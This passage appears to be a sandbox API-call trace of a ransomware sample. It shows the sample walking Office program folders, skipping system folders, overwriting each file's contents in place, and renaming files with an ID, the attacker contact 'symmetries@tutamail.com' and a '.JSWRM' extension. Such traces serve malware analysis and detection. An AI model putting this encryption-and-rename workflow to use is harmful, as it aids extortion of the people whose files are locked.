0x22d298 [0114.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0114.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0114.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0114.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0114.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0114.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0114.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0114.902] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_k_col.hxk"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSOUC_K_COL.HXK.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\msouc_k_col.hxk.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0114.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0114.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0114.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0114.903] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4c15e5f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4c15e5f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xafa146a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5f470, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB.HXS", cAlternateFileName="")) returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2=".") returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="..") returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="...") returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="windows") returned -1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="recovery") returned -1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="perflogs") returned -1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="documents and settings") returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="$RECYCLE.BIN") returned 1 [0114.903] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="system volume information") returned -1 [0114.904] lstrcmpiW (lpString1="MSPUB.HXS", lpString2="msocache") returned 1 [0114.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.HXS", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0114.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.HXS", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.HXS", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.HXS", lpUsedDefaultChar=0x0) returned 9 [0114.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0114.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0114.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0114.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0114.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0114.904] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0114.904] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=390256) returned 1 [0114.904] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.905] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0114.905] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0115.058] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.058] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0115.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.059] CloseHandle (hObject=0x238) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0115.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0115.059] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0115.059] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0115.059] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224c40 | out: hHeap=0x1e0000) returned 1 [0115.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0115.061] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2ef8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB.OPG", cAlternateFileName="")) returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2=".") returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="..") returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="...") returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="windows") returned -1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="recovery") returned -1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="perflogs") returned -1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="documents and settings") returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="$RECYCLE.BIN") returned 1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="system volume information") returned -1 [0115.061] lstrcmpiW (lpString1="MSPUB.OPG", lpString2="msocache") returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.OPG", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.061] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.OPG", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.OPG", lpUsedDefaultChar=0x0) returned 9 [0115.061] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0115.061] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0115.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.OPG", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0115.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB.OPG", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.OPG", lpUsedDefaultChar=0x0) returned 9 [0115.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0115.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0115.062] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0115.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.062] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.062] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0115.062] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.opg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.063] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12024) returned 1 [0115.063] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.063] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ef0) returned 0x24c1d0 [0115.063] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ef0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2ef0, lpOverlapped=0x0) returned 1 [0115.067] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.067] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ef0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2ef0, lpOverlapped=0x0) returned 1 [0115.067] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0115.068] CloseHandle (hObject=0x238) returned 1 [0115.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0115.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0115.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0115.069] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0115.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.069] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0115.069] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0115.069] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.OPG" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.opg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB.OPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub.opg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0115.070] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x9ba9874, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x9ba9874, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x9ba9874, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x277, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="MSPUB_COL.HXC", cAlternateFileName="MSPUB_~1.HXC")) returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2=".") returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="..") returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="...") returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="windows") returned -1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="recovery") returned -1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="perflogs") returned -1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="documents and settings") returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="system volume information") returned -1 [0115.070] lstrcmpiW (lpString1="MSPUB_COL.HXC", lpString2="msocache") returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0115.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345ebd8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0115.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXC", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0115.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXC", cchWideChar=13, lpMultiByteStr=0x345eba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXC", lpUsedDefaultChar=0x0) returned 13 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0115.070] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0115.070] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0115.070] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.071] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.071] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.071] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=631) returned 1 [0115.071] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.071] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x270) returned 0x20b1f8 [0115.071] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x270, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x270, lpOverlapped=0x0) returned 1 [0115.073] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.073] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x270, lpOverlapped=0x0) returned 1 [0115.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0115.073] CloseHandle (hObject=0x238) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0115.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0115.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.073] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0115.073] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.074] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MSPUB_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mspub_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.074] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0115.074] HeapFree (in: 